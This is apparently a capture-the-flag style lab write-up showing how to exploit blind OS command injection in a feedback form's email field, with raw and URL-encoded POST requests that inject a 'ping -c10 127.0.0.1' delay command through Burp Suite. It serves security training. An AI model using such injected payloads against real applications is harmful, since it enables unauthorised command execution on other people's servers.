This lab contains a blind OS command injection vulnerability in the feedback function.
⚠️ The application executes a shell command containing user-supplied input, but the output is not returned in the response.
Cause a 10-second delay by exploiting the command injection.
We’ll test the vulnerability by injecting into the email or subject fields.
The objective is to cause a 10-second delay from the server by injecting a command like ping
We send this raw request in the email field
csrf =... &[email protected]&ping -c10 127.0.0.1 &&subject=nothing&message=nothing
❌ No delay observed, which means the special characters are not interpreted directly.
We now encode the payload using Ctrl+U in BurpSuite, to make sure the special characters are passed correctly.
📥 Final POST request
csrf=MBSoAfHwuv7NeOU9lPrhDmsxpoYe9Wbk&name=hacker
&email=hacker%40gmail.com%26ping+-c10+127.0.0.1+%26
&subject=nothing
&message=nothing
🔁 Submit this encoded request via BurpSuite Repeater